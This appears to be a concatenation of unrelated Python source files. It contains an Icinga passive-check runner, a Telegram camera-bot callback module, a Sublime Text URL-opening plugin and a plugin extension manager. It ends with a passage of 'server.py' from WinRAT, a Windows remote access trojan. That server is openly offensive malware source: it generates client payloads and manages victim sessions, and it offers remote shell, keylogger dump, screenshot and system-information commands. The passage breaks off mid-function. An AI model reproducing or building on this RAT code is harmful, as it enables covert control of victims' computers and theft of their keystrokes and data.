raise RuntimeError("Execution of send_nsca failed - {}".format(stdout))
def executeAndSubmitAsync(user, serviceName, cmd, noSudo):
p = Process(target=executeAndSubmit, args=(user,serviceName, cmd, noSudo,))
p.start()
return p
def executeConfig(hostname, filename, runAsync, noSudo):
asyncTasks = []
# parse config and start tasks
with open(filename,"r") as f:
for line in f:
splitted = list(filter(lambda x: x, line.split("\t")))
user, serviceName, cmd = splitted
p = executeAndSubmitAsync(user, serviceName, cmd, noSudo)
# run async or join directly
if runAsync:
asyncTasks += [p]
else:
p.join()
# wait for all processes to finish if was async
for task in asyncTasks:
task.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Icinga passive checks and curl report-ins.')
parser.add_argument('-H', '--hostname', help='Local Identity (often hostname)')
parser.add_argument('--nsca-config',
help='send-nsca configuration file (default set by nsca-package)')
parser.add_argument('--nsca-bin', default="/usr/sbin/send_nsca",
help='send-nsca executable (default: /usr/sbin/send_nsca)')
parser.add_argument('-c', '--config', dest='configurationFile', default="monitoring.conf",
help='Configuration file (default: ./monitoring.conf)')
parser.add_argument('-a', '--async', dest='runAsync', action="store_const",
const=True, default=False, help='Run checks asynchronous')
parser.add_argument('-u', '--ignore-user', dest='ignoreUser',
action="store_const", const=True, default=False,
help='Run as current user and ignore user column in config file')
parser.add_argument('-x', '--gateway', help='If set, use an async icinga checks gateway')
parser.add_argument('-t', '--gateway-token', help='Token to use with the gateway')
args = parser.parse_args()
if not args.hostname:
hostname = socket.gethostname()
else:
hostname = args.hostname
nscaConfig = args.nsca_config
sendNscaPath = args.nsca_bin
filename = args.configurationFile
noSudo = args.ignoreUser
executeConfig(hostname, filename, args.runAsync, noSudo)
|
callbacks.py
|
"""Camera callbacks module."""
import logging
from threading import Thread
from telegram.ext import run_async
from hikcamerabot.constants import Detections, Streams, Alarms, Events
from hikcamerabot.decorators import authorization_check, camera_selection
from hikcamerabot.utils import (build_commands_presentation, make_bold,
get_user_info)
log = logging.getLogger(__name__)
def error_handler(update, ctx):
"""Handle known Telegram bot API errors."""
log.exception('Got error: %s', ctx.error)
@authorization_check
@camera_selection
@run_async
def cmds(update, ctx, cam_id, cam_meta, event_id):
"""Print camera commands."""
cmd_help(update, ctx, append=True, requested=False, cam_id=cam_id)
@authorization_check
@camera_selection
@run_async
def cmd_getpic(update, ctx, cam_id, cam_meta, event_id):
"""Get and send resized snapshot from the camera."""
log.info('Resized cam snapshot from %s requested', cam_meta.description)
log.debug(get_user_info(update))
payload = {'event': Events.TAKE_SNAPSHOT,
'event_id': event_id,
'params': {'resize': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_getfullpic(update, ctx, cam_id, cam_meta, event_id):
"""Get and send full snapshot from the camera."""
log.info('Full cam snapshot requested')
log.debug(get_user_info(update))
payload = {'event': Events.TAKE_SNAPSHOT,
'event_id': event_id,
'params': {'resize': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@run_async
def cmd_stop(update, ctx):
"""Terminate bot."""
msg = f'Stopping {ctx.bot.first_name} bot'
log.info(msg)
log.debug(get_user_info(update))
update.message.reply_text(msg)
ctx.bot.thread_manager.stop_threads()
ctx.bot.proc_manager.stop_processes()
thread = Thread(target=ctx.bot.stop_polling)
thread.start()
@authorization_check
@run_async
def cmd_list_cams(update, ctx):
"""List user's cameras."""
log.info('Camera list has been requested')
cam_count = ctx.bot.cam_registry.get_count()
msg = [make_bold('You have {0} camera{1}'.format(
cam_count, '' if cam_count == 1 else 's'))]
for cam_id, meta in ctx.bot.cam_registry.get_all().items():
presentation = build_commands_presentation(ctx.bot, cam_id)
msg.append(
'<b>Camera:</b> {0}\n'
'<b>Description:</b> {1}\n'
'<b>Commands</b>\n'
'{2}'.format(cam_id, meta['conf'].description, presentation))
update.message.reply_html('\n\n'.join(msg))
log.info('Camera list has been sent')
@authorization_check
@camera_selection
@run_async
def cmd_intrusion_detection_off(update, ctx, cam_id, cam_meta, event_id):
"""Disable camera's Intrusion Detection."""
payload = {'event': Events.CONFIGURE_DETECTION,
'event_id': event_id,
'name': Detections.INTRUSION,
'params': {'switch': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_intrusion_detection_on(update, ctx, cam_id, cam_meta, event_id):
"""Enable camera's Intrusion Detection."""
payload = {'event': Events.CONFIGURE_DETECTION,
'event_id': event_id,
'name': Detections.INTRUSION,
'params': {'switch': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_motion_detection_off(update, ctx, cam_id, cam_meta, event_id):
"""Disable camera's Motion Detection."""
payload = {'event': Events.CONFIGURE_DETECTION,
'event_id': event_id,
'name': Detections.MOTION,
'params': {'switch': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_motion_detection_on(update, ctx, cam_id, cam_meta, event_id):
"""Enable camera's Motion Detection."""
payload = {'event': Events.CONFIGURE_DETECTION,
'event_id': event_id,
'name': Detections.MOTION,
'params': {'switch': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_line_detection_off(update, ctx, cam_id, cam_meta, event_id):
"""Disable camera's Line Crossing Detection."""
payload = {'event': Events.CONFIGURE_DETECTION,
'event_id': event_id,
'name': Detections.LINE,
'params': {'switch': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_line_detection_on(update, ctx, cam_id, cam_meta, event_id):
"""Enable camera's Line Crossing Detection."""
payload = {'event': Events.CONFIGURE_DETECTION,
'event_id': event_id,
'name': Detections.LINE,
'params': {'switch': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_stream_yt_on(update, ctx, cam_id, cam_meta, event_id):
"""Start YouTube stream."""
payload = {'event': Events.STREAM,
'event_id': event_id,
'name': Streams.YOUTUBE,
'params': {'switch': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_stream_yt_off(update, ctx, cam_id, cam_meta, event_id):
"""Stop YouTube stream."""
payload = {'event': Events.STREAM,
'event_id': event_id,
'name': Streams.YOUTUBE,
'params': {'switch': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_stream_icecast_on(update, ctx, cam_id, cam_meta, event_id):
"""Start Icecast stream."""
payload = {'event': Events.STREAM,
'event_id': event_id,
'name': Streams.ICECAST,
'params': {'switch': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_stream_icecast_off(update, ctx, cam_id, cam_meta, event_id):
"""Stop Icecast stream."""
payload = {'event': Events.STREAM,
'event_id': event_id,
'name': Streams.ICECAST,
'params': {'switch': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_alert_on(update, ctx, cam_id, cam_meta, event_id):
"""Enable camera's Alert Mode."""
log.info('Enabling camera\'s alert mode requested')
log.debug(get_user_info(update))
payload = {'event': Events.CONFIGURE_ALARM,
'event_id': event_id,
'name': Alarms.ALARM,
'params': {'switch': True}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@camera_selection
@run_async
def cmd_alert_off(update, ctx, cam_id, cam_meta, event_id):
"""Disable camera's Alert Mode."""
log.info('Disabling camera\'s alert mode requested')
log.debug(get_user_info(update))
payload = {'event': Events.CONFIGURE_ALARM,
'event_id': event_id,
'name': Alarms.ALARM,
'params': {'switch': False}}
ctx.bot.event_manager.send_event(cam_id, payload)
@authorization_check
@run_async
def cmd_help(update, ctx, append=False, requested=True, cam_id=None):
"""Send help message to telegram chat."""
if requested:
log.info('Help message has been requested')
log.debug(get_user_info(update))
update.message.reply_text(
'Use /list command to list available cameras and commands\n'
'Use /stop command to fully stop the bot')
elif append:
presentation = build_commands_presentation(ctx.bot, cam_id)
update.message.reply_html(
f'<b>Available commands</b>\n\n{presentation}\n\n/list cameras')
log.info('Help message has been sent')
|
open_url.py
|
# Open URL opens selected URLs, files, folders, or looks up text in web searcher
import sublime
import sublime_plugin
import webbrowser
import threading
import os
import subprocess
import platform
from urllib.parse import urlparse
from urllib.parse import quote
from .url import is_url
def prepend_scheme(s):
o = urlparse(s)
if not o.scheme:
s = 'http://' + s
return s
def remove_trailing_delimiter(url, trailing_delimiters):
"""Removes trailing delimiters.
Args:
url: A url that could potentially have some trailing characters that
need to be removed.
trailing_delimiters: A string of characters that should not be seen at
the end of a URL.
Returns:
The input url with the trailing delimiting characters removed; if any
are found.
"""
if not trailing_delimiters:
return url
while url:
if url[-1] in trailing_delimiters:
url = url[:-1]
else:
break
return url
class OpenUrlCommand(sublime_plugin.TextCommand):
def run(self, edit=None, url=None, show_menu=True):
self.config = sublime.load_settings('open_url.sublime-settings')
# Sublime Text has its own open_url command used for things like Help > Documentation
# so if a url is passed, open it instead of getting text from the view
if url is None:
url = self.get_selection()
path = self.abs_path(url)
if os.path.isfile(path):
self.file_action(path, show_menu)
return
if os.path.isdir(path):
self.folder_action(path, show_menu)
return
if is_url(url):
url = prepend_scheme(url)
url = remove_trailing_delimiter(url, self.config.get('trailing_delimiters'))
self.open_tab(url)
else:
self.modify_or_search_action(url)
def get_selection(self):
"""Returns selection. If selection contains no characters, expands it
until hitting delimiter chars.
"""
s = self.view.sel()[0]
start = s.begin()
end = s.end()
if start != end:
return self.view.substr(sublime.Region(start, end)).strip()
# nothing is selected, so expand selection to nearest delimeters
view_size = self.view.size()
delimeters = list(self.config.get('delimiters'))
# move the selection back to the start of the url
while start > 0:
if self.view.substr(start - 1) in delimeters:
break
start -= 1
# move end of selection forward to the end of the url
while end < view_size:
if self.view.substr(end) in delimeters:
break
end += 1
return self.view.substr(sublime.Region(start, end)).strip()
def abs_path(self, path):
"""Attempts to convert path into absolute path.
"""
path = os.path.expandvars(os.path.expanduser(path))
if os.path.isabs(path):
return path
file_path = self.view.file_name()
if file_path: # this file has been saved to disk
abs_path = os.path.join(os.path.dirname(file_path), path)
if os.path.exists(abs_path): # if file relative to current view exists, open it, else continue
return abs_path
project = self.view.window().project_data()
if project is None: # nothing more to try
return path
try: # look for file relative to project root
return os.path.join(os.path.expanduser(project['folders'][0]['path']), path)
except (KeyError, IndexError):
return path
def run_subprocess(self, args):
"""Runs on another thread to avoid blocking main thread.
"""
def sp(args):
subprocess.check_call(args, shell=not isinstance(args, list))
threading.Thread(target=sp, args=(args,)).start()
def open_tab(self, url):
browser = self.config.get('web_browser', "")
def ot(url, browser):
try:
controller = webbrowser.get(browser or None)
except:
e = 'Python couldn\'t find the "{}" browser on your machine. Change "web_browser" in Open URL\'s settings.'
sublime.error_message(e.format(browser or 'default'))
return
controller.open_new_tab(url)
threading.Thread(target=ot, args=(url, browser)).start()
def modify_or_search_action(self, term):
"""Not a URL and not a local path; prompts user to modify path and looks
for it again, or searches for this term using a web searcher.
"""
searchers = self.config.get('web_searchers', [])
opts = ['modify path ({})'.format(term)]
opts += ['{} ({})'.format(s['label'], term) for s in searchers]
sublime.active_window().show_quick_panel(opts, lambda idx: self.modify_or_search_done(idx, searchers, term))
def modify_or_search_done(self, idx, searchers, term):
if idx < 0:
return
if idx == 0:
self.view.window().show_input_panel('URL or path:', term, self.url_search_modified, None, None)
return
idx -= 1
searcher = searchers[idx]
self.open_tab('{}{}'.format(
searcher.get('url'),
quote(term.encode(searcher.get('encoding', 'utf-8'))),
))
def folder_action(self, folder, show_menu=True):
if not show_menu:
self.reveal(folder)
return
openers = self.config.get('folder_custom_commands', [])
extra = self.config.get('folder_extra_commands', True)
extra = ['add to sublime project', 'new sublime window'] if extra else []
opts = ['reveal'] + extra + [opener.get('label') for opener in openers]
sublime.active_window().show_quick_panel(opts, lambda idx: self.folder_done(idx, opts, folder))
def folder_done(self, idx, opts, folder):
if idx < 0:
return
if idx == 0:
self.reveal(folder)
return
extra = self.config.get('folder_extra_commands', True)
if not extra:
idx += 2
if idx == 1: # add folder to project
d = self.view.window().project_data()
if not d:
d = {}
if 'folders' not in d:
d['folders'] = []
d['folders'].append({'path': folder})
self.view.window().set_project_data(d)
elif idx == 2:
self.open_in_new_window(folder)
else: # custom opener was used
openers = self.config.get('folder_custom_commands', [])
commands = openers[idx-3].get('commands')
self.run_subprocess(commands + [folder])
def reveal(self, path):
spec = {
'dir': {'Darwin': ['open'], 'Windows': ['explorer'], 'Linux': ['nautilus', '--browser']},
'file': {
'Darwin': ['open', '-R'],
'Windows': ['explorer', '/select,"<path>"'],
'Linux': ['nautilus', '--browser'],
}
}
if not platform.system() in spec['dir']:
raise 'unsupported os'
args = spec['dir' if os.path.isdir(path) else 'file'][platform.system()]
if '<path>' in args[-1:]:
args[-1:] = args[-1:].replace('<path>', path)
else:
args.append(path)
subprocess.Popen(args)
def url_search_modified(self, text):
"""Call open_url again on modified path.
"""
try:
self.view.run_command('open_url', {'url': text})
except ValueError:
pass
def file_action(self, path, show_menu=True):
"""Asks user if they'd like to edit or run the file.
"""
if not show_menu:
self.view.window().open_file(path)
return
action = 'menu'
autoinfo = None
# see if there's already an action defined for this file
for auto in self.config.get('autoactions'):
# see if this line applies to this opperating system
if 'os' in auto:
oscheck = auto['os'] == 'any' \
or (auto['os'] == 'win' and platform.system() == 'Windows') \
or (auto['os'] == 'lnx' and platform.system() == 'Linux') \
or (auto['os'] == 'mac' and platform.system() == 'Darwin') \
or (auto['os'] == 'psx' and (platform.system() == 'Darwin' or platform.system() == 'Linux'))
else:
oscheck = True
# if the line is for this OS, then check to see if we have a file pattern match
if oscheck:
for ending in auto['endswith']:
if (path.endswith(ending)):
action = auto['action']
autoinfo = auto
break
# either show a menu or perform the action
if action == 'menu':
openers = self.config.get('file_custom_commands', [])
extra = self.config.get('file_extra_commands', True)
extra = ['run', 'new sublime window', 'system open'] if extra else []
sublime.active_window().show_quick_panel(
['edit', 'reveal'] + extra + [opener.get('label') for opener in openers],
lambda idx: self.file_done(idx, autoinfo, path),
)
elif action == 'edit':
self.file_done(0, autoinfo, path)
elif action == 'run':
self.file_done(1, autoinfo, path)
else:
raise 'unsupported action'
def runfile(self, autoinfo, path):
plat = platform.system()
# default methods to open files
defrun = {'Darwin': 'open', 'Windows': '', 'Linux': 'mimeopen'}
if plat not in defrun:
raise 'unsupported os'
# check if there are special instructions to open this file
if autoinfo is None or 'openwith' not in autoinfo:
if autoinfo is not None and plat == 'Darwin' and 'app' in autoinfo:
cmd = "%s -a %s %s" % self.quote((defrun[plat], autoinfo['app'], path))
elif defrun[platform.system()]:
cmd = "%s %s" % self.quote((defrun[platform.system()], path))
else:
cmd = self.quote(path)
else:
cmd = "%s %s" % self.quote((autoinfo['openwith'], path))
# run command in a terminal and pause if desired
if autoinfo and 'terminal' in autoinfo and autoinfo['terminal']:
pause = 'pause' in autoinfo and autoinfo['pause']
xterm = {'Darwin': '/opt/X11/bin/xterm', 'Linux': '/usr/bin/xterm'}
if plat in xterm:
cmd = [xterm[plat], '-e', cmd + ('; read -p "Press [ENTER] to continue..."' if pause else '')]
elif os.name == 'nt':
# subprocess.call has an odd behavior on windows in that if a parameter contains quotes
# it tries to escape the quotes by adding a slash in front of each double quote
# so c:\temp\hello.bat if passed to subprocess.call as "c:\temp\hello.bat"
# will be passed to the OS as \"c:\temp\hello.bat\"
# echo Windows doesn't know how to interpret that, so we need to remove the double quotes,
# which breaks files with spaces in their path
cmd = [
'c:\\windows\\system32\\cmd.exe', '/c', '%s%s' % (cmd.replace('"', ''), ' & pause' if pause else '')
]
else:
raise 'unsupported os'
self.run_subprocess(cmd)
def file_done(self, idx, autoinfo, path):
if idx < 0:
return
if idx == 0:
self.view.window().open_file(path)
return
if idx == 1:
self.reveal(path)
return
extra = self.config.get('file_extra_commands', True)
if not extra:
idx += 3
if idx == 2:
self.runfile(autoinfo, path)
elif idx == 3:
self.open_in_new_window(path)
elif idx == 4:
self.system_open(path)
else: # custom opener was used
openers = self.config.get('file_custom_commands', [])
commands = openers[idx-5].get('commands')
self.run_subprocess(commands + [path])
def system_open(self, path):
if sublime.platform() == 'osx':
args = ['open', path]
elif sublime.platform() == 'linux':
args = [path]
elif sublime.platform() == 'windows':
args = ['start', path]
else:
raise Exception('unsupported os')
subprocess.Popen(args, cwd=os.path.dirname(path))
def quote(self, stuff):
if isinstance(stuff, str):
return '"' + stuff + '"'
elif isinstance(stuff, list):
return [self.quote(x) for x in stuff]
elif isinstance(stuff, tuple):
return tuple(self.quote(list(stuff)))
else:
raise 'unsupported type'
def open_in_new_window(self, path):
items = []
executable_path = sublime.executable_path()
if sublime.platform() == 'osx':
app_path = executable_path[:executable_path.rfind('.app/')+5]
executable_path = app_path + 'Contents/SharedSupport/bin/subl'
# build arguments
path = os.path.abspath(path)
items.append(executable_path)
if os.path.isfile(path):
items.append(os.path.dirname(path))
items.append(path)
subprocess.Popen(items, cwd=items[1])
|
extension_manager.py
|
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import imp
import os
import threading
import time
import six
from oslo_log import log as logging
from rock import exceptions
LOG = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class ExtensionDescriptor(object):
"""Base class that defines the contract for extensions."""
@abc.abstractmethod
def get_name(self):
"""The name of the extension.
e.g. 'Host Management IP Ping'
"""
@abc.abstractmethod
def get_alias(self):
"""The alias for the extension.
e.g. 'host-mgmt-ping'
"""
@abc.abstractmethod
def get_description(self):
"""Friendly description for the extension.
e.g. 'Delay of ping to management IP of host.'
"""
@abc.abstractmethod
def periodic_task(self):
"""Task that you need to run periodically.
e.g. 'ping to xxx'
"""
@staticmethod
def period_decorator(interval=10):
def wrapper(func):
def _wrapper(*args, **kwargs):
result = None
while True:
start_time = time.time()
result = func(*args, **kwargs)
end_time = time.time()
used_time = round(end_time - start_time, 3)
if interval - used_time < 0:
LOG.warning("Plugin: %s run outlasted interval by"
" %.3f seconds." % (func.__module__,
used_time - interval))
time.sleep(0)
else:
time.sleep(interval - used_time)
return result
return _wrapper
return wrapper
class ExtensionManager(object):
"""Load extensions from the configured extension path.
"""
def __init__(self, path):
LOG.info('Initializing extension manager.')
self.path = path
self.extensions = {}
self.periodic_tasks = {}
self._load_all_extensions()
def _load_all_extensions(self):
"""Load extensions from the configured path.
The extension name is constructed from the module_name. If your
extension module is named widgets.py, the extension class within that
module should be 'Widgets'.
"""
for path in self.path.split(':'):
if os.path.exists(path):
self._load_all_extensions_from_path(path)
else:
LOG.error("Extension path '%s' doesn't exist!", path)
def _load_all_extensions_from_path(self, path):
for f in sorted(os.listdir(path)):
try:
LOG.debug('Loading extension file: %s', f)
mod_name, file_ext = os.path.splitext(os.path.split(f)[-1])
ext_path = os.path.join(path, f)
if file_ext.lower() == '.py' and not mod_name.startswith('_'):
mod = imp.load_source(mod_name, ext_path)
ext_name = mod_name[0].upper() + mod_name[1:]
new_ext_class = getattr(mod, ext_name, None)
if not new_ext_class:
LOG.warning('Did not find expected name '
'"%(ext_name)s" in %(file)s',
{'ext_name': ext_name,
'file': ext_path})
continue
new_ext = new_ext_class()
self.add_extension(new_ext)
except Exception as exception:
LOG.warning("Extension file %(f)s wasn't loaded due to "
"%(exception)s", {'f': f,
'exception': exception})
def add_extension(self, ext):
alias = ext.get_alias()
LOG.info('Loaded extension: %s', alias)
if alias in self.extensions:
raise exceptions.DuplicatedExtension(alias=alias)
self.extensions[alias] = ext
@ExtensionDescriptor.period_decorator(60)
def report_status(self):
current_thread_list = threading.enumerate()
thread_name = []
for thread in current_thread_list:
if thread.name in self.extensions:
thread_name.append(thread.name)
LOG.info("Current plugin threads: " + " ".join(thread_name))
# If some extensions threads exit unexpectedly, create a new thread
# for it
none_thread_extensions = [i for i in self.extensions
if i not in thread_name]
if len(none_thread_extensions) > 0:
LOG.info("Recreating thread(s) for extension(s): " + " ".join(
none_thread_extensions))
for ext in none_thread_extensions:
task = getattr(self.extensions[ext], 'periodic_task')
task_name = ext
t = threading.Thread(target=task, name=task_name)
t.start()
def start_collect_data(self):
for extension in self.extensions:
task = getattr(self.extensions[extension], 'periodic_task')
task_name = extension
t = threading.Thread(target=task, name=task_name)
t.start()
t = threading.Thread(
target=self.report_status, name='Plugins-Status-Report')
t.start()
|
server.py
|
import sys
import os
import socket
import time
import base64
import tabulate
import signal
import subprocess
import argparse
import shutil
import threading
import platform
import PyInstaller.__main__
from datetime import datetime
__LOGO__ = """
▒█░░▒█ ░▀░ █▀▀▄ ▒█▀▀█ ░█▀▀█ ▀▀█▀▀
▒█▒█▒█ ▀█▀ █░░█ ▒█▄▄▀ ▒█▄▄█ ░▒█░░
▒█▄▀▄█ ▀▀▀ ▀░░▀ ▒█░▒█ ▒█░▒█ ░▒█░░
%s v1.0 @muneebwanee
"""
__HELP_OVERALL__ = """usage: python3 WinRAT.py command [--help] [--option OPTION]
These are the commands available for usage:
bind Run the Server on machine and establish connections
generate Generate the Payload file for target platform
You can further get help on available commands by supplying
'--help' argument. For example: 'python3 winrat generate --help'
will print help manual for generate commmand
"""
__HELP_BIND__ = """usage: python3 winrat.py bind [--address ADDRESS] [--port PORT]
Args Description
-h, --help Show Help for Bind command
-a, --address IP Address to Bind to
-p, --port Port Number on which to Bind
The Bind command is used to bind the application on server
for incoming connections and control the clients through
the command interface
"""
__HELP_GENERATE__ = """
usage: python3 winrat.py generate [--address ADDRESS] [--port PORT] [--output OUTPUT]
Args Description
-h, --help Show Help Manual for generate command
-a, --address IP Address of server. [Connect to]
-p, --port Port of connecting server
-o, --output Output file to generate
-s, --source Do not generate compiled code.
Gives Python source file.
--persistence Auto start on reboot [Under Development]
The generate command generates the required payload
file to be executed on client side. The establish
connection to server and do commands.
"""
class PULL:
WHITE = '\033[1m\033[0m'
PURPLE = '\033[1m\033[95m'
CYAN = '\033[1m\033[96m'
DARKCYAN = '\033[1m\033[36m'
BLUE = '\033[1m\033[94m'
GREEN = '\033[1m\033[92m'
YELLOW = '\033[1m\033[93m'
RED = '\033[1m\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
LINEUP = '\033[F'
def __init__(self):
if not self.support_colors:
self.win_colors()
def support_colors(self):
plat = sys.platform
supported_platform = plat != 'Pocket PC' and (plat != 'win32' or \
'ANSICON' in os.environ)
is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()
if not supported_platform or not is_a_tty:
return False
return True
def win_colors(self):
self.WHITE = ''
self.PURPLE = ''
self.CYAN = ''
self.DARKCYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.BOLD = ''
self.UNDERLINE = ''
self.END = ''
def get_com(self, mss=()):
if mss:
rtval = input(self.DARKCYAN + "$" + self.END + " [" + self.GREEN + mss[1].ip + self.END + ":" + self.RED + str(mss[1].port) + self.END + "] ")
else:
rtval = input(self.DARKCYAN + "$" + self.END + " ")
rtval = rtval.rstrip(" ").lstrip(" ")
return rtval
def print(self, mess):
print(self.GREEN + "[" + self.UNDERLINE + "*" + self.END + self.GREEN + "] " + self.END + mess + self.END)
def function(self, mess):
print(self.BLUE + "[" + self.UNDERLINE + ":" + self.END + self.BLUE + "] " + self.END + mess + self.END)
def error(self, mess):
print(self.RED + "[" + self.UNDERLINE + "!" + self.END + self.RED + "] " + self.END + mess + self.END)
def exit(self, mess=""):
sys.exit(self.RED + "[" + self.UNDERLINE + "~" + self.END + self.RED + "] " + self.END + mess + self.END)
def logo(self):
print(self.DARKCYAN + __LOGO__ % self.YELLOW + self.END)
def help_c_current(self):
headers = (pull.BOLD + 'Command' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('help', 'Shows manual for commands'),
('sessions', 'Show all connected clients to the server'),
('connect', 'Connect to a Specific Client'),
('disconnect', 'Disconnect from Current Client'),
('clear', 'Clear Screen'),
('shell' , 'Launch a New Terminal/Shell.'),
('keylogger', 'KeyLogger Module'),
('sysinfo', 'Dump System, Processor, CPU and Network Information'),
('screenshot', 'Take Screenshot on Target Machine and Save on Local'),
('exit', 'Exit from WinRAT!')
]
sys.stdout.write("\n")
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_general(self):
headers = (pull.BOLD + 'Command' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('help', 'Shows manual for commands'),
('sessions', 'Show all connected clients to the server'),
('connect', 'Connect to a Specific Client'),
('disconnect', 'Disconnect from Current Client'),
('clear', 'Clear Screen'),
('exit', 'Exit from WinRAT!')
]
sys.stdout.write("\n")
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_sessions(self):
sys.stdout.write("\n")
print("Info : Display connected sessions to the server!")
print("Arguments : None")
print("Example : \n")
print("$ sessions")
sys.stdout.write("\n")
def help_c_connect(self):
sys.stdout.write("\n")
print("Info : Connect to an available session!")
print("Arguments : Session ID")
print("Example : \n")
print("$ connect 56\n")
headers = (pull.BOLD + 'Argument' + pull.END, pull.BOLD + 'Type' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('ID', 'integer', 'ID of the sessions from the list')
]
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_disconnect(self):
sys.stdout.write("\n")
print("Info : Disconnect current session!")
print("Arguments : None")
print("Example : \n")
print("$ disconnect")
sys.stdout.write("\n")
def help_c_clear(self):
sys.stdout.write("\n")
print("Info : Clear screen!")
print("Arguments : None")
print("Example : \n")
print("$ clear")
sys.stdout.write("\n")
def help_c_shell(self):
sys.stdout.write("\n")
print("Info : Launch a shell against client!")
print("Arguments : None")
print("Example : \n")
print("$ shell")
sys.stdout.write("\n")
def help_c_keylogger(self):
sys.stdout.write("\n")
print("Info : Keylogger Module!")
print("Arguments : on, off, dump")
print("Example : \n")
print("$ keylogger on")
print("$ keylogger off")
print("$ keylogger dump\n")
headers = (pull.BOLD + 'Argument' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('on', 'Turn Keylogger on'),
('off', 'Turn Keylogger off'),
('dump', 'Dump keylogs')
]
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def help_c_sysinfo(self):
sys.stdout.write("\n")
print("Info : Gathers system information!")
print("Arguments : None")
print("Example : \n")
print("$ sysinfo")
sys.stdout.write("\n")
def help_c_screenshot(self):
sys.stdout.write("\n")
print("Info : Screenshot the current screen and save it on server!")
print("Arguments : None")
print("Example : \n")
print("$ screenshot")
sys.stdout.write("\n")
def help_overall(self):
global __HELP_OVERALL__
print(__HELP_OVERALL__)
sys.exit(0)
def help_bind(self):
global __HELP_BIND__
print(__HELP_BIND__)
sys.exit(0)
def help_generate(self):
global __HELP_GENERATE__
print(__HELP_GENERATE__)
sys.exit(0)
pull = PULL()
class CLIENT:
STATUS = "Active"
MESSAGE = ""
KEY = ")J@NcRfU"
def __init__(self, sock, addr):
self.sock = sock
self.ip = addr[0]
self.port = addr[1]
def acceptor(self):
data = ""
chunk = ""
while True:
chunk = self.sock.recv(4096)
if not chunk:
self.STATUS = "Disconnected"
break
data += chunk.decode('utf-8')
if self.KEY.encode('utf-8') in chunk:
try:
self.MESSAGE = base64.decodebytes(data.rstrip(self.KEY).encode('utf-8')).decode('utf-8')
except UnicodeDecodeError:
self.MESSAGE = base64.decodebytes(data.rstrip(self.KEY).encode('utf-8'))
if not self.MESSAGE:
self.MESSAGE = " "
data = ""
def engage(self):
t = threading.Thread(target=self.acceptor)
t.daemon = True
t.start()
def send_data(self, val):
self.sock.send(base64.encodebytes(val.encode('utf-8')) + self.KEY.encode('utf-8'))
def recv_data(self):
while not self.MESSAGE:
try:
pass
except KeyboardInterrupt:
break
rtval = self.MESSAGE
self.MESSAGE = ""
return rtval
class COMMCENTER:
CLIENTS = []
COUNTER = 0
CURRENT = () #### Current Target Client ####
KEYLOGS = []
def c_help(self, vals):
if len(vals) > 1:
if vals[1] == "sessions":
pull.help_c_sessions()
elif vals[1] == "connect":
pull.help_c_connect()
elif vals[1] == "disconnect":
pull.help_c_disconnect()
elif vals[1] == "clear":
pull.help_c_clear()
elif vals[1] == "shell":
pull.help_c_shell()
elif vals[1] == "keylogger":
pull.help_c_keylogger()
elif vals[1] == "sysinfo":
pull.help_c_sysinfo()
elif vals[1] == "screenshot":
pull.help_c_screenshot()
else:
if self.CURRENT:
pull.help_c_current()
else:
pull.help_c_general()
def get_valid(self, _id):
for client in self.CLIENTS:
if client[0] == int(_id):
return client
return False
def c_ping(self, _id):
return
def c_connect(self, args):
if len(args) == 2:
tgt = self.get_valid(args[1])
if tgt:
self.CURRENT = tgt
else:
sys.stdout.write("\n")
pull.error("No client is associated with that ID!")
sys.stdout.write("\n")
else:
sys.stdout.write("\n")
pull.error("Invalid Syntax!")
sys.stdout.write("\n")
def c_disconnect(self):
self.CURRENT = ()
def c_sessions(self):
headers = (pull.BOLD + 'ID' + pull.END, pull.BOLD + 'IP Address' + pull.END, pull.BOLD + 'Incoming Port' + pull.END, pull.BOLD + 'Status' + pull.END)
lister = []
for client in self.CLIENTS:
toappend = []
toappend.append(pull.RED + str(client[0]) + pull.END)
toappend.append(pull.DARKCYAN + client[1].ip + pull.END)
toappend.append(pull.BLUE + str(client[1].port) + pull.END)
toappend.append(pull.GREEN + client[1].STATUS + pull.END)
lister.append(toappend)
